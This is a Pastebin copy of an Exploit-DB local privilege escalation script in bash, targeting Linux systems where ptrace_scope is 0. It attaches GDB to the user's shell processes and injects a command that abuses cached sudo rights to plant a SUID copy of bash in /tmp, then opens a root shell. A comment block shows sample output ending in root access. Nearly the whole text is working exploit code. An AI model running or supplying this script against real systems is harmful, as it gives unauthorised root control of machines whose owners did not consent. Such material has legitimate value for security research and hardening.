TVT618

EDB-ID-46989.sh

Jun 17th, 2019
679
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env bash
  2.  
  3. #######################################################
  4. #                                                     #
  5. #           'ptrace_scope' misconfiguration           #
  6. #              Local Privilege Escalation             #
  7. #                                                     #
  8. #######################################################
  9.  
  10. # Affected operating systems (TESTED):
  11. #   Parrot Home/Workstation    4.6 (Latest Version)
  12. #       Parrot Security            4.6 (Latest Version)
  13. #   CentOS / RedHat            7.6 (Latest Version)
  14. #   Kali Linux              2018.4 (Latest Version)
  15.  
  16. # Authors: Marcelo Vazquez  (s4vitar)
  17. #      Victor Lasa       (vowkin)
  18.  
  19. #┌─[s4vitar@parrot]─[~/Desktop/Exploit/Privesc]
  20. #└──╼ $./exploit.sh
  21. #
  22. #[*] Checking if 'ptrace_scope' is set to 0... [√]
  23. #[*] Checking if 'GDB' is installed...         [√]
  24. #[*] System seems vulnerable!                  [√]
  25. #
  26. #[*] Starting attack...
  27. #[*] PID -> sh
  28. #[*] Path 824: /home/s4vitar
  29. #[*] PID -> bash
  30. #[*] Path 832: /home/s4vitar/Desktop/Exploit/Privesc
  31. #[*] PID -> sh
  32. #[*] Path
  33. #[*] PID -> sh
  34. #[*] Path
  35. #[*] PID -> sh
  36. #[*] Path
  37. #[*] PID -> sh
  38. #[*] Path
  39. #[*] PID -> bash
  40. #[*] Path 1816: /home/s4vitar/Desktop/Exploit/Privesc
  41. #[*] PID -> bash
  42. #[*] Path 1842: /home/s4vitar
  43. #[*] PID -> bash
  44. #[*] Path 1852: /home/s4vitar/Desktop/Exploit/Privesc
  45. #[*] PID -> bash
  46. #[*] Path 1857: /home/s4vitar/Desktop/Exploit/Privesc
  47. #
  48. #[*] Cleaning up...                            [√]
  49. #[*] Spawning root shell...                    [√]
  50. #
  51. #bash-4.4# whoami
  52. #root
  53. #bash-4.4# id
  54. #uid=1000(s4vitar) gid=1000(s4vitar) euid=0(root) egid=0(root) grupos=0(root),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(debian-tor),124(bluetooth),136(scanner),1000(s4vitar)
  55. #bash-4.4#
  56.  
  57.  
  58. function startAttack(){
  59.   tput civis && pgrep "^(echo $(cat /etc/shells | tr '/' ' ' | awk 'NF{print $NF}' | tr '\n' '|'))$" -u "$(id -u)" | sed '$ d' | while read shell_pid; do
  60.     if [ $(cat /proc/$shell_pid/comm 2>/dev/null) ] || [ $(pwdx $shell_pid 2>/dev/null) ]; then
  61.       echo "[*] PID -> "$(cat "/proc/$shell_pid/comm" 2>/dev/null)
  62.       echo "[*] Path $(pwdx $shell_pid 2>/dev/null)"
  63.     fi; echo 'call system("echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1")' | gdb -q -n -p "$shell_pid" >/dev/null 2>&1
  64.     done
  65.  
  66.     if [ -f /tmp/bash ]; then
  67.       /tmp/bash -p -c 'echo -ne "\n[*] Cleaning up..."
  68.                       rm /tmp/bash
  69.                       echo -e "                            [√]"
  70.                       echo -ne "[*] Spawning root shell..."
  71.                       echo -e "                    [√]\n"
  72.                       tput cnorm && bash -p'
  73.     else
  74.       echo -e "\n[*] Could not copy SUID to /tmp/bash          [✗]"
  75.     fi
  76. }
  77.  
  78. echo -ne "[*] Checking if 'ptrace_scope' is set to 0..."
  79. if grep -q "0" < /proc/sys/kernel/yama/ptrace_scope; then
  80.   echo " [√]"
  81.   echo -ne "[*] Checking if 'GDB' is installed..."
  82.   if command -v gdb >/dev/null 2>&1; then
  83.     echo -e "         [√]"
  84.     echo -e "[*] System seems vulnerable!                  [√]\n"
  85.     echo -e "[*] Starting attack..."
  86.  
  87.     startAttack
  88.  
  89.   else
  90.     echo "         [✗]"
  91.     echo "[*] System is NOT vulnerable :(               [✗]"
  92.   fi
  93. else
  94.   echo " [✗]"
  95.   echo "[*] System is NOT vulnerable :(               [✗]"
  96. fi; tput cnorm
RAW Paste Data